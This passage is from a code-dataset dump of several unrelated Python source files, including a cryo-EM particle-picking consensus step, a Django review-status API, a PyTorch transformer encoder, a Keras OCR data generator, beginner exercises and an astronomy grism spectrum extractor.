coordinates.get().iterCoordinates(micId)])\n coordArray *= Tm[n]/Tm[0]\n coords.append(coordArray)\n Ncoords += coordArray.shape[0]\n n+=1\n \n allCoords = np.zeros([Ncoords,2])\n votes = np.zeros(Ncoords)\n \n # Add all coordinates in the first method\n N0 = coords[0].shape[0]\n inAllMicrographs = self.consensus <= 0 or self.consensus == len(self.inputCoordinates)\n if N0==0 and inAllMicrographs:\n return\n elif N0>0:\n allCoords[0:N0,:] = coords[0]\n votes[0:N0] = 1\n \n # Add the rest of coordinates\n Ncurrent = N0\n for n in range(1, len(self.inputCoordinates)):\n for coord in coords[n]:\n if Ncurrent>0:\n dist = np.sum((coord - allCoords[0:Ncurrent])**2, axis=1)\n imin = np.argmin(dist)\n if sqrt(dist[imin]) < self.consensusRadius:\n newCoord = (votes[imin]*allCoords[imin,]+coord)/(votes[imin]+1)\n allCoords[imin,] = newCoord\n votes[imin] += 1\n else:\n allCoords[Ncurrent,:] = coord\n votes[Ncurrent] = 1\n Ncurrent += 1\n else:\n allCoords[Ncurrent, :] = coord\n votes[Ncurrent] = 1\n Ncurrent += 1\n\n # Select those in the consensus\n if self.consensus <= 0:\n consensus = len(self.inputCoordinates)\n 
else:\n            consensus = self.consensus.get()\n        consensusCoords = allCoords[votes>=consensus,:]\n        jaccardIdx = float(len(consensusCoords))/(float(len(allCoords))/len(self.inputCoordinates))\n        # COSS: Possible problem with concurrent writes\n        with open(self._getExtraPath('jaccard.txt'), \"a\") as fhJaccard:\n            fhJaccard.write(\"%d %f\\n\"%(micId,jaccardIdx))\n        \n        # Write the consensus file only if there\n        # are some coordinates (size > 0)\n        if consensusCoords.size:\n            np.savetxt(self._getExtraPath('consensus_%06d.txt' % micId), consensusCoords)\n        \n    def createOutputStep(self):\n        firstCoords = self.inputCoordinates[0].get()\n        inputMics = firstCoords.getMicrographs()\n        setOfCoordinates = self._createSetOfCoordinates(inputMics)\n        setOfCoordinates.setBoxSize(firstCoords.getBoxSize())\n        \n        # Read all consensus particles\n        for micrograph in inputMics:\n            fnTmp = self._getExtraPath('consensus_%06d.txt' % micrograph.getObjId())\n            if os.path.exists(fnTmp):\n                coords = np.loadtxt(fnTmp)\n                if coords.size == 2: # special case with only one coordinate in consensus\n                    coords = [coords]\n                for coord in coords:\n                    aux = Coordinate()\n                    aux.setMicrograph(micrograph)\n                    aux.setX(coord[0])\n                    aux.setY(coord[1])\n                    setOfCoordinates.append(aux)\n            #cleanPath(fnTmp)\n\n        # Set output\n        self._defineOutputs(outputCoordinates=setOfCoordinates)\n        \n        for coordinates in self.inputCoordinates:\n            self._defineSourceRelation(coordinates, self.outputCoordinates)\n","repo_name":"I2PC/scipion-web","sub_path":"pyworkflow/em/packages/xmipp3/protocol_particle_pick_consensus.py","file_name":"protocol_particle_pick_consensus.py","file_ext":"py","file_size_in_byte":8540,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"3228636654","text":"# -*- coding: utf-8 -*-\nfrom core import resource\nfrom core.jsonresponse import create_response\nfrom core.exceptionutil import unicode_full_stack\n\nimport models as apps_models\nfrom mall.models import Order\nfrom modules.member.models import Member\n\n\ndef _get_order_id_to_id(evaluates):\n\torder_ids = [p.order_id for p in evaluates]\n\treturn {o.order_id: o.id for o in Order.objects.filter(order_id__in=order_ids)}\n\nclass GetProductEvaluatesStatus(resource.Resource):\n\tapp = 'apps/evaluate'\n\tresource = 'get_product_evaluates_status'\n\n\tdef api_get(request):\n\t\t\"\"\"\n\t\tMember centre - orders awaiting review: get the review status of the orders awaiting review\n\t\t@params woid, member_id\n\t\t@return:{\n\t\t\t\t \"orders\": [\n\t\t\t\t\t {'order_id':6789,\n\t\t\t\t\t 'order_is_reviewed':True,\n\t\t\t\t\t 'order_product':\n\t\t\t\t\t\t [{'product_id':3333333,\n\t\t\t\t\t\t\t'order_has_product_id':5555555,\n\t\t\t\t\t\t\t'has_reviewed_picture':True,\n\t\t\t\t\t\t\t'has_reviewed':True\n\t\t\t\t\t\t\t}]\n\t\t\t\t\t }\n\t\t\t\t\t]\n\t\t\t\t}\n\t\t\"\"\"\n\n\t\towner_id = request.GET.get('woid', None)\n\t\tmember_id = request.GET.get('member_id', None)\n\t\tresponse = create_response(500)\n\t\tif not owner_id or not member_id:\n\t\t\tresponse.errMsg = u'参数错误'\n\t\t\treturn response.get_response()\n\t\tevaluates = apps_models.ProductEvaluates.objects(owner_id=int(owner_id), member_id=int(member_id))\n\t\torder_id2id = _get_order_id_to_id(evaluates)\n\t\torder_id2evaluates = dict()\n\t\torder_id2status = dict()\n\t\tfor evaluate in evaluates:\n\t\t\torder_id = order_id2id.get(evaluate.order_id, 0)\n\t\t\torder_status = order_id2status.get(order_id, True)\n\t\t\thas_reviewed = False\n\t\t\tif isinstance(evaluate.detail, dict):\n\t\t\t\tfor k, v in evaluate.detail.items():\n\t\t\t\t\tif (k.find('qa') >= 0 and v) or (k.find('selection') >= 0 and v):\n\t\t\t\t\t\thas_reviewed = True\n\t\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\thas_reviewed = True\n\t\t\ttemp_dict = {\n\t\t\t\t'product_id': evaluate.product_id,\n\t\t\t\t'order_has_product_id': evaluate.order_has_product_id,\n\t\t\t\t'has_reviewed_picture': len(evaluate.pics) > 0,\n\t\t\t\t'has_reviewed': has_reviewed\n\t\t\t}\n\t\t\tif not order_id2evaluates.has_key(order_id):\n\t\t\t\torder_id2evaluates[order_id] = [temp_dict]\n\t\t\telse:\n\t\t\t\torder_id2evaluates[order_id].append(temp_dict)\n\n\t\t\torder_id2status[order_id] = order_status and len(evaluate.pics) > 0 and has_reviewed\n\t\torders = []\n\t\tfor k, v in order_id2evaluates.items():\n\t\t\torders.append({\n\t\t\t\t'order_id': k,\n\t\t\t\t'order_is_reviewed': order_id2status.get(k, True),\n\t\t\t\t'order_product': v\n\t\t\t})\n\t\tresponse = create_response(200)\n\t\tresponse.data = {'orders': orders}\n\t\treturn response.get_response()\n\nclass GetProductEvaluates(resource.Resource):\n\tapp = 'apps/evaluate'\n\tresource = 'get_product_evaluates'\n\n\tdef api_get(request):\n\t\t\"\"\"\n\t\tProduct detail page - fetch two review entries\n\t\t@params woid, product_id\n\t\t@return {\n\t\t\t'product_reviews': [{\n\t\t\t\t'status': 2,\n\t\t\t\t'member_icon': '',\n\t\t\t\t'created_at': '2016-06-06 10:32:10',\n\t\t\t\t'member_id': 1,\n\t\t\t\t'review_detail': '',\n\t\t\t\t'member_name': 'bill'\n\t\t\t}],\n\t\t\t'has_more': True\n\t\t}\n\t\t\"\"\"\n\t\towner_id = request.GET.get('woid', None)\n\t\tproduct_id = request.GET.get('product_id', None)\n\t\tresponse = create_response(500)\n\t\tif not owner_id or not product_id:\n\t\t\tresponse.errMsg = u'参数错误'\n\t\t\treturn response.get_response()\n\n\t\t#products related to the evaluation also have to be taken into account\n\t\towner_id=int(owner_id)\n\t\tproduct_id = int(product_id)\n\t\trelations = apps_models.EvaluatesRelatedProducts.objects(owner_id=owner_id, product_id=product_id)\n\t\tif relations.count() > 0:\n\t\t\tproduct_ids = apps_models.EvaluatesRelations.objects(id=relations.first().belong_to).first().related_product_ids\n\t\telse:\n\t\t\tproduct_ids = [product_id]\n\n\t\tevaluates = apps_models.ProductEvaluates.objects(owner_id=owner_id, product_id__in=product_ids, status__in=[apps_models.STATUS_PASSED, apps_models.STATUS_TOP]).order_by('-top_time', '-created_at')\n\t\tmember_ids = [e.member_id for e in evaluates]\n\t\tmember_id2info = {m.id: {'icon': m.user_icon, 'name': m.username_for_title} for m in Member.objects.filter(id__in=member_ids)}\n\t\tresult = []\n\t\tcount = 0\n\t\tfor evaluate in evaluates:\n\t\t\tcount += 1\n\t\t\tmember_id = evaluate.member_id\n\t\t\tdetail = evaluate.detail\n\t\t\ttemp_detail = []\n\t\t\tif isinstance(detail, dict):\n\t\t\t\tfor k, v in sorted(detail.items()):\n\t\t\t\t\tif (k.find('qa') >= 0 and v) or (k.find('selection') >= 0 and v):\n\t\t\t\t\t\ttemp_detail.append(v.split('::')[1])\n\t\t\t\ttemp_detail = u';'.join(temp_detail)\n\t\t\telse:\n\t\t\t\ttemp_detail = detail\n\n\t\t\tresult.append({\n\t\t\t\t'status': evaluate.status,\n\t\t\t\t'member_icon': member_id2info[member_id]['icon'],\n\t\t\t\t'created_at': evaluate.created_at.strftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t\t'member_id': member_id,\n\t\t\t\t'review_detail': temp_detail,\n\t\t\t\t'member_name': member_id2info[member_id]['name']\n\t\t\t})\n\t\t\tif count >= 2:\n\t\t\t\tbreak\n\t\tresponse = create_response(200)\n\t\tresponse.data = {\n\t\t\t'product_reviews': result,\n\t\t\t'has_more': evaluates.count() > 2\n\t\t}\n\t\treturn response.get_response()\n\nclass GetUnreviewdCount(resource.Resource):\n\tapp = 'apps/evaluate'\n\tresource = 'get_unreviewd_count'\n\n\tdef api_get(request):\n\t\t\"\"\"\n\t\tMember centre - awaiting review (get the count): all of the current member's products without review pictures\n\t\t@param\torder_has_product_list_ids\n\t\t@return: {\n\t\t\t\t\"reviewed_count\": int\n\t\t\t}\n\t\t\"\"\"\n\t\tresponse = create_response(500)\n\t\torder_has_product_list_ids = request.GET.get('order_has_product_list_ids', None)\n\t\tif not order_has_product_list_ids:\n\t\t\tresponse.errMsg = u'缺少参数'\n\t\t\treturn response.get_response()\n\t\torder_has_product_list_ids = map(lambda x: int(x), order_has_product_list_ids.split('_'))\n\t\ttry:\n\t\t\tcount = apps_models.ProductEvaluates.objects(order_has_product_id__in=order_has_product_list_ids, pics__ne=[]).count()\n\t\t\tresponse = create_response(200)\n\t\t\tresponse.data = {\n\t\t\t\t\"reviewed_count\": count\n\t\t\t}\n\t\t\treturn response.get_response()\n\t\texcept:\n\t\t\tresponse.errMsg = u'查询失败'\n\t\t\treturn response.get_response()\n\nclass GetOrderEvaluatesStatus(resource.Resource):\n\n\tapp = 'apps/evaluate'\n\tresource = 'get_order_evaluates'\n\n\tdef api_get(request):\n\t\t\"\"\"\n\t\tMember centre - all orders: get the review status of each order\n\t\t@param woid, member_id\n\t\t@return: {\n\t            \"orders\": [\n\t                {'order_id':6789,\n\t                 'order_is_reviewed':True,\n\t                }]\n\t        }\n\t\t\"\"\"\n\t\towner_id = request.GET.get('woid', None)\n\t\tmember_id = request.GET.get('member_id', None)\n\t\tresponse = create_response(500)\n\t\tif not owner_id or not member_id:\n\t\t\tresponse.errMsg = u'参数错误'\n\t\t\treturn response.get_response()\n\t\torder_evas = apps_models.OrderEvaluates.objects(owner_id=int(owner_id), member_id=int(member_id))\n\t\torder_id2id = _get_order_id_to_id(order_evas)\n\t\tresponse = create_response(200)\n\t\tresponse.data = {'orders': [{'order_id': order_id2id.get(o.order_id, 0), 'order_is_reviewed': True} for o in order_evas]}\n\t\treturn response.get_response()","repo_name":"chengdg/weizoom","sub_path":"weapp/apps/customerized_apps/evaluate/remote_call.py","file_name":"remote_call.py","file_ext":"py","file_size_in_byte":6746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6285090067","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom src.tools import activation_factory, initialization_factory\nfrom src.models.common.DropPathLayer import DropPath\nimport numpy as np\n\nfrom IPython import embed; from sys import exit\n\nclass Encoder(nn.Module):\n\n    def __init__(\n        self, \n        in_channels, \n        num_hid, \n        num_head, \n        num_feed_forward, \n        num_layers, \n        dropout=0.0, \n        learn_pos_enc=False, \n        max_seq_len=None,\n        seq_emb_activation='relu',\n        seq_emb_init='he',\n        seq_emb_learn_nan_emb=False,\n        tformer_activation='relu',\n        tformer_init='he',\n        tformer_mha_dropout=0.0,\n        tformer_ffn_dropout=0.0,\n        tformer_first_drop_path=0.0,\n        tformer_second_drop_path=0.0\n    ):\n        super().__init__()\n        self.num_hid = num_hid\n        self.learn_pos_enc = learn_pos_enc\n        self.seq_emb = SeqEmbedding(\n            in_channels=in_channels, \n            num_hid=num_hid, \n            max_seq_len=max_seq_len\n        )\n        self.encoder = nn.ModuleList(\n            [TransformerEncoder(\n                embed_dim=num_hid, \n                num_heads=num_head, \n                feed_forward_dim=num_feed_forward, \n                rate=dropout,\n                activation=tformer_activation,\n                init=tformer_init,\n                mha_dropout=tformer_mha_dropout,\n                ffn_dropout=tformer_ffn_dropout,\n                first_drop_path=tformer_first_drop_path,\n                second_drop_path=tformer_second_drop_path\n            ) for _ in range(num_layers)]\n        )\n\n    def forward(self, seq, seq_mask):\n        # seq = (batch, seq_len, features)\n        seq = self.seq_emb(seq)\n\n        
for l in self.encoder:\n seq = l(seq, seq_mask)\n\n return seq\n \n\nclass SeqEmbedding(nn.Module):\n\n def __init__(self, in_channels, num_hid, max_seq_len):\n super().__init__()\n linear1 = nn.Linear(in_features=in_channels, out_features=num_hid, bias=False)\n linear2 = nn.Linear(in_features=num_hid, out_features=num_hid, bias=False)\n\n self.emb = nn.Sequential(\n linear1,\n nn.GELU(),\n linear2\n )\n self.nan_emb = nn.parameter.Parameter(\n data=torch.zeros((num_hid), dtype=torch.float32),\n requires_grad=True\n )\n self.pos_emb = nn.parameter.Parameter(\n data=torch.zeros((max_seq_len, num_hid), dtype=torch.float32),\n requires_grad=True\n )\n\n fan = torch.nn.init._calculate_correct_fan(self.emb[2].weight, mode='fan_in')\n bound = np.sqrt(6 / fan)\n with torch.no_grad():\n torch.nn.init.xavier_uniform_(self.emb[0].weight)\n torch.nn.init.uniform_(self.emb[2].weight, a=-bound, b=bound)\n\n def forward(self, seq):\n seq = torch.where(\n # Checks whether landmark is missing in frame\n seq.sum(2, keepdims=True) == 0,\n # If so, the empty embedding is used\n self.nan_emb,\n # Otherwise the landmark data is embedded\n self.emb(seq),\n )\n seq = seq + self.pos_emb\n return seq\n\nclass MultiHeadAttention(nn.Module):\n\n def __init__(self, d_model, num_of_heads, dropout):\n super().__init__()\n depth = d_model // num_of_heads\n self.num_of_heads = num_of_heads\n self.wq = torch.nn.ModuleList([torch.nn.Linear(in_features=d_model, out_features=depth//2, bias=False) for _ in range(num_of_heads)])\n self.wk = torch.nn.ModuleList([torch.nn.Linear(in_features=d_model, out_features=depth//2, bias=False) for _ in range(num_of_heads)])\n self.wv = torch.nn.ModuleList([torch.nn.Linear(in_features=d_model, out_features=depth//2, bias=False) for _ in range(num_of_heads)])\n self.wo = torch.nn.Linear(in_features=(depth//2)*self.num_of_heads, out_features=d_model, bias=False)\n self.do = nn.Dropout(dropout)\n self.register_buffer(name='scale', tensor=torch.sqrt(torch.FloatTensor([depth])))\n\n with torch.no_grad():\n for i in range(num_of_heads):\n torch.nn.init.xavier_uniform_(self.wq[i].weight)\n torch.nn.init.xavier_uniform_(self.wk[i].weight)\n torch.nn.init.xavier_uniform_(self.wv[i].weight)\n torch.nn.init.xavier_uniform_(self.wo.weight)\n\n def scaled_dot_product(self, q, k, v, attention_mask):\n qkt = torch.matmul(q,k.permute(0,2,1))\n scaled_qkt = qkt/self.scale\n scaled_qkt = scaled_qkt.masked_fill(attention_mask, -1e10)\n scaled_qkt = F.softmax(scaled_qkt, dim=-1)\n z = torch.matmul(scaled_qkt, v)\n return z\n\n def forward(self, q, k, v, attention_mask=None):\n multi_attn = []\n for i in range(self.num_of_heads):\n Q = self.wq[i](q)\n K = self.wk[i](k)\n V = self.wv[i](v)\n multi_attn.append(self.scaled_dot_product(Q,K,V,attention_mask))\n multi_head = torch.cat(multi_attn, axis=-1)\n multi_head_attention = self.wo(multi_head)\n multi_head_attention = self.do(multi_head_attention)\n\n return multi_head_attention\n\nclass TransformerEncoder(nn.Module):\n\n def __init__(self,embed_dim, num_heads, feed_forward_dim, rate=0.1, activation='relu', init='he', mha_dropout=0.0, ffn_dropout=0.0, first_drop_path=0.0, second_drop_path=0.0):\n super().__init__()\n self.lnorm1 = nn.LayerNorm(normalized_shape=embed_dim, eps=1e-6)\n self.attn = MultiHeadAttention(embed_dim, num_heads, mha_dropout)\n self.lnorm2 = nn.LayerNorm(normalized_shape=embed_dim, eps=1e-6)\n\n linear1 = nn.Linear(in_features=embed_dim, out_features=feed_forward_dim, bias=False)\n linear2 = nn.Linear(in_features=feed_forward_dim, 
out_features=embed_dim, bias=False)\n\n        self.ffn = nn.Sequential(\n            linear1,\n            nn.GELU(),\n            nn.Dropout(ffn_dropout),\n            linear2,\n        )\n\n        fan = torch.nn.init._calculate_correct_fan(self.ffn[3].weight, mode='fan_in')\n        bound = np.sqrt(6 / fan)\n        with torch.no_grad():\n            torch.nn.init.xavier_uniform_(self.ffn[0].weight)\n            torch.nn.init.uniform_(self.ffn[3].weight, a=-bound, b=bound)\n\n    def forward(self, seq, seq_mask):\n        # seq = (batch, len, num_hid)\n        seq = self.lnorm1(seq + self.attn(seq,seq,seq,seq_mask))\n        seq = self.lnorm2(seq + self.ffn(seq))\n\n        return seq","repo_name":"joshuasv/SLFR-examples","sub_path":"src/models/encoders/MARK.py","file_name":"MARK.py","file_ext":"py","file_size_in_byte":6622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33789285590","text":"def mostralinha():\n    print('-'*50)\ndef bemvindo():\n    print('Seja bem vindo!')\n    print(\"Espero que goste.\")\n\nmostralinha()\nbemvindo()\nmostralinha()\n\ndef cadastrar(nome):\n    print(nome,'foi cadastrado')\n\n\ncadastrar('davi')\ncadastrar('vida')\ncadastrar('iavd')\nmostralinha()\ndef operacoes(n1,n2):\n    print('soma',n1+n2)\n    print('Subtração =',n1-n2)\n    print('Multiplicação',n1*n2)\n    print('Divisão',n1/n2)\n\n\noperacoes(6,8)\n\nmostralinha()\nprint(len('davi'))\nmostralinha()\ndef triplo(num):\n    return num * 3\n\ntotal = triplo(3) * triplo(3)\nprint(total)\nmostralinha()\n\ndef rendimento(deposito,taxa):\n    for x in range(24):\n        deposito += deposito*taxa/100\n    return deposito\n\nprint(rendimento(500,0.5))\n\ndef mul(n1,n2):\n    return n1*n2\nmostralinha()\nprint(mul(5,5))\nmostralinha()\ndef modulo(num):\n    if num>=0:\n        return num\n    else:\n        return num *-1\n\nprint(modulo(-9))","repo_name":"davigledson/Programacao-Estruturada-e-Orientada-a-Objetos","sub_path":"Programação Estruturada/aula008-revisao-para-att/ex001.py","file_name":"ex001.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"pt","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"14343178834","text":"\"\"\"\nImplement a function that takes an integer and outputs the number of 1s in the\nbinary representation of that number. For example, 9 in binary is 1001, which\nhas two 1 bits, so for the input 9 the function should output 2.\n\"\"\"\n\nclass Solution(object):\n    def binary_count(self, n):\n        counter = 0\n        if n<0:\n            n = ~n + 1\n        while n > 1:\n            m = n % 2\n            counter += m\n            n = n // 2\n        counter += n\n        return counter\n\nclass Solution1(object):\n    def binary_count(self, n):\n        counter = 0\n        flag = 1\n        while flag < (1 << 31):\n            if n & flag:\n                counter += 1\n            flag = (flag << 1)\n        return counter\n\nif __name__ == '__main__':\n    s1 = Solution1()\n    s = Solution()\n    print(s1.binary_count(n=-16666))\n    print(s.binary_count(n=-16666))","repo_name":"yuyaxiong/interveiw_algorithm","sub_path":"剑指offer/二进制中1的个数.py","file_name":"二进制中1的个数.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70840494953","text":"import keras.callbacks\nimport numpy as np\nfrom src.handwritten_text_recognition.file_manager.file_loader import FileLoader\nimport src.handwritten_text_recognition.ocr.text_preprocessing as text_preprocessing\n\n\nclass DataGenerator(keras.callbacks.Callback):\n    def __init__(self, downsample_factor=2 ** 2, line_width_padded=535,\n                 line_height_normalized=64, max_string_length=7):\n        super().__init__()\n\n        self.downsample_factor = downsample_factor\n\n        self.line_height_normalized = line_height_normalized\n        self.line_width_padded = line_width_padded\n        self.max_string_length = 
max_string_length\n\n self.image_paths = None\n self.image_labels = None\n\n self.batch_size = None\n self.validation_split = None\n self.number_of_training_data = None\n self.number_of_validation_data = None\n self.number_of_validation_split = None\n\n self.current_train_index = None\n self.current_val_index = None\n\n def setup_training(self, image_paths, image_labels, batch_size=32, validation_split=0.2):\n assert len(image_paths) == len(image_labels)\n\n self.image_paths = image_paths\n self.image_labels = image_labels\n\n self.batch_size = batch_size\n\n self.validation_split = validation_split\n self.number_of_training_data = len(image_paths)\n self.number_of_validation_data = int(self.number_of_training_data * validation_split)\n self.number_of_validation_split = self.number_of_training_data - self.number_of_validation_data\n\n self.current_train_index = 0\n self.current_val_index = self.number_of_validation_split\n\n def generate_training(self):\n while 1:\n batch_output = self._get_batch_for_training()\n\n self.current_train_index += self.batch_size\n if self.current_train_index >= self.number_of_validation_split:\n self.current_train_index = self.current_train_index % 32 # probably self.batch_size\n self.image_paths, self.image_labels = self._shuffle_data(self.image_paths, self.image_labels)\n\n yield batch_output\n\n def generate_validation(self):\n while 1:\n batch_output = self._get_batch_for_training()\n\n self.current_val_index += self.batch_size\n if self.current_val_index >= self.number_of_training_data:\n self.current_val_index = self.number_of_validation_split + self.current_val_index % 32\n # set index back to the validation split starting value\n\n yield batch_output\n\n def generate_prediction(self, image, batch_size=1):\n while 1:\n batch_output = self._get_batch_for_prediction(image, batch_size)\n network_input = batch_output[0]\n yield batch_output\n\n def get_steps_per_epoch(self):\n return (self.number_of_training_data - self.number_of_validation_data) // self.batch_size\n\n def get_validation_steps(self):\n return self.number_of_validation_data // self.batch_size\n\n def on_train_begin(self, logs=None):\n print(\"On train begin...\")\n self._shuffle_data(self.image_paths, self.image_labels)\n\n def _get_batch_for_training(self):\n batch_images, batch_labels, input_length, label_length = self._bootstrap_model_input(batch_size=self.batch_size)\n\n target_strings = []\n for i in range(self.batch_size):\n image_path = self.image_paths[self.current_train_index + i]\n image_label = self.image_labels[self.current_train_index + i]\n\n target_strings.append(image_label)\n\n image_train = self._get_image(image_path)\n x_train_image = text_preprocessing.process_image(image_train, self.line_height_normalized)\n x_train_image = text_preprocessing.pad_sequence(x_train_image, self.line_height_normalized,\n self.line_width_padded)\n y_train_label = self._process_label(image_label)\n\n single_label_length = len(image_label)\n single_label_length = np.array([single_label_length])\n\n batch_images[i, 0:self.line_width_padded, :, 0] = x_train_image\n batch_labels[i, 0:len(image_label)] = y_train_label\n input_length[i] = self.line_width_padded // self.downsample_factor - 2\n # -2 as the first couple outputs of the RNN tend to be garbage\n label_length[i] = single_label_length\n\n inputs = {'input': batch_images,\n 'labels': batch_labels,\n 'input_length': input_length,\n 'label_length': label_length,\n 'target_strings': target_strings\n }\n outputs = {'ctc': 
np.zeros([self.batch_size])} # dummy data for dummy loss function\n return inputs, outputs\n\n def _get_batch_for_prediction(self, image, batch_size):\n batch_images, batch_labels, input_length, label_length = self._bootstrap_model_input(batch_size=batch_size)\n\n for i in range(batch_size):\n image_label = '42'\n\n x_image = text_preprocessing.process_image(image, self.line_height_normalized)\n x_image = text_preprocessing.pad_sequence(x_image, self.line_height_normalized,\n self.line_width_padded)\n\n y_label = self._process_label(image_label)\n\n single_label_length = len(image_label)\n single_label_length = np.array([single_label_length])\n\n batch_images[i, 0:self.line_width_padded, :, 0] = x_image\n batch_labels[i, 0:len(image_label)] = y_label\n input_length[i] = self.line_width_padded // self.downsample_factor - 2\n # -2 as the first couple outputs of the RNN tend to be garbage\n label_length[i] = single_label_length\n\n inputs = {'input': batch_images,\n 'labels': batch_labels,\n 'input_length': input_length,\n 'label_length': label_length\n }\n outputs = {'ctc': np.zeros([batch_size])} # dummy data for dummy loss function\n return inputs, outputs\n\n def _bootstrap_model_input(self, batch_size):\n batch_images = np.ones([batch_size, self.line_width_padded, self.line_height_normalized, 1])\n batch_labels = np.ones([batch_size, self.max_string_length]) * -1\n input_length = np.zeros([batch_size, 1])\n label_length = np.zeros([batch_size, 1])\n\n return batch_images, batch_labels, input_length, label_length\n\n def _process_label(self, image_label):\n ret = []\n lower_case_offset = 26\n upper_case_offset = 26\n number_offset = 10\n\n try:\n for char in image_label:\n if char >= 'a' and char <= 'z':\n ret.append(ord(char) - ord('a')) # lowercase letters go from 0 to 25\n elif char >= 'A' and char <= 'Z':\n ret.append(ord(char) - ord('A') + lower_case_offset)\n elif char in '0123456789':\n ret.append(ord(char) - ord('0') + lower_case_offset + upper_case_offset)\n elif char == ' ':\n ret.append(number_offset + lower_case_offset + upper_case_offset)\n elif char == ',':\n ret.append(number_offset + lower_case_offset + upper_case_offset + 1)\n elif char == '.':\n ret.append(number_offset + lower_case_offset + upper_case_offset + 2)\n elif char == '-':\n ret.append(number_offset + lower_case_offset + upper_case_offset + 3)\n elif char == '/':\n ret.append(number_offset + lower_case_offset + upper_case_offset + 4)\n else:\n '''All other possible characters are also recognised as '/' for now\n we will have to change the model to fit in more characters, also,\n other characters are all too rare in training data for now.'''\n ret.append(number_offset + lower_case_offset + upper_case_offset + 4)\n return np.array(ret)\n except Exception:\n ret.append(number_offset + lower_case_offset + upper_case_offset + 4)\n return np.array(ret)\n\n def _shuffle_data(self, x_data, y_data, stop_index=None):\n data_length = len(self.image_paths)\n if stop_index is None:\n stop_index = data_length\n assert stop_index <= data_length\n\n a = list(range(stop_index))\n np.random.shuffle(a)\n a += list(range(stop_index, data_length)) # add unshuffled validation indices\n\n if isinstance(x_data, np.ndarray):\n x_data = x_data[a]\n elif isinstance(x_data, list):\n x_data = [x_data[i] for i in a]\n\n if isinstance(y_data, np.ndarray):\n y_data = y_data[a]\n elif isinstance(y_data, list):\n y_data = [y_data[i] for i in a]\n\n return x_data, y_data\n\n def _get_image(self, image_path):\n image_container = 
FileLoader.load_image(image_path)\n        return image_container.get_unprocessed_image()\n","repo_name":"CrazyCrud/ocr-with-keras","sub_path":"src/handwritten_text_recognition/ocr/train/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":9227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"18089235085","text":"from typing import List\n\ndef convert_classes_to_table(classes: list, attributes_to_print: List[str]):\n    if len(classes) == 0:\n        return classes\n\n    table = []\n    table.append(attributes_to_print)\n    for class_ in classes:\n        row = []\n        for attribute_path in attributes_to_print:\n            attribute = class_\n            for attribute_key in attribute_path.split(\".\"):\n                if not hasattr(attribute, attribute_key):\n                    raise AttributeError(f\"'{class_}' does not have the attribute '{attribute_path}'\")\n                attribute = getattr(attribute, attribute_key)\n            row.append(str(attribute))\n        table.append(row)\n    return table\n","repo_name":"Xerner/python-class-query","sub_path":"clsquery/convert_classes_to_table.py","file_name":"convert_classes_to_table.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"43739294312","text":"__author__ = 'Vince.ec'\n\nfrom grizli import model\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom astropy.table import Table\nfrom astropy import wcs\nfrom astropy.io import fits\nfrom glob import glob\nimport os\n\ndef Extract_BeamCutout(target_id, grism_file, mosaic, seg_map, instrument, catalog):\n    flt = model.GrismFLT(grism_file = grism_file,\n                         ref_file = mosaic, seg_file = seg_map,\n                         pad=200, ref_ext=0, shrink_segimage=True, force_grism = instrument)\n    \n    # catalog / segmentation image\n    ref_cat = Table.read(catalog, format='ascii')\n    seg_cat = flt.blot_catalog(ref_cat, sextractor=False)\n    flt.compute_full_model(ids=seg_cat['id'])\n    beam = flt.object_dispersers[target_id][2]['A']\n    co = model.BeamCutout(flt, beam, conf=flt.conf)\n    \n    PA = np.round(fits.open(grism_file)[0].header['PA_V3'], 1)\n    \n    co.write_fits(root='beams/o{0}'.format(PA), clobber=True)\n\n    ### add EXPTIME to extension 0\n    fits.setval('beams/o{0}_{1}.{2}.A.fits'.format(PA, target_id, instrument), 'EXPTIME', ext=0,\n                value=fits.open('beams/o{0}_{1}.{2}.A.fits'.format(PA, target_id, instrument))[1].header['EXPTIME'])  \n\ndef Scale_model(data, sigma, model):\n    return np.sum(((data * model) / sigma ** 2)) / np.sum((model ** 2 / sigma ** 2))\n\n\nclass Gen_spec(object):\n    def __init__(self, beam, redshift, gal_wv, gal_fl, gal_er, minwv = 7800, maxwv = 11200):\n        self.beam = model.BeamCutout(fits_file = beam)\n        self.redshift = redshift\n        self.gal_wv = gal_wv\n        self.gal_fl = gal_fl\n        self.gal_er = gal_er\n        \"\"\"Trim the observed spectrum to [minwv, maxwv] and precompute the grism\n        sensitivity curve used to normalize simulated spectra.\n        \"\"\"\n\n        IDX = [U for U in range(len(self.gal_wv)) if minwv <= self.gal_wv[U] <= maxwv]\n\n        self.gal_wv_rf = gal_wv[IDX] / (1 + self.redshift)\n        self.gal_wv = gal_wv[IDX]\n        self.gal_fl = gal_fl[IDX]\n        self.gal_er = gal_er[IDX]\n\n        ## Get sensitivity function\n        flat = self.beam.flat_flam.reshape(self.beam.beam.sh_beam)\n        fwv, ffl, e = self.beam.beam.optimal_extract(flat, bin=0)\n        \n        self.filt = interp1d(fwv, ffl)(self.gal_wv)\n        \n    def Sim_spec(self, model_wv, model_fl, model_redshift = 0, dust = 0):\n        if model_redshift == 0:\n            model_redshift = self.redshift\n        \n        ## Compute the models\n        self.beam.compute_model(spectrum_1d=[model_wv*(1+model_redshift), model_fl])\n\n        ## Extract the model (error array 
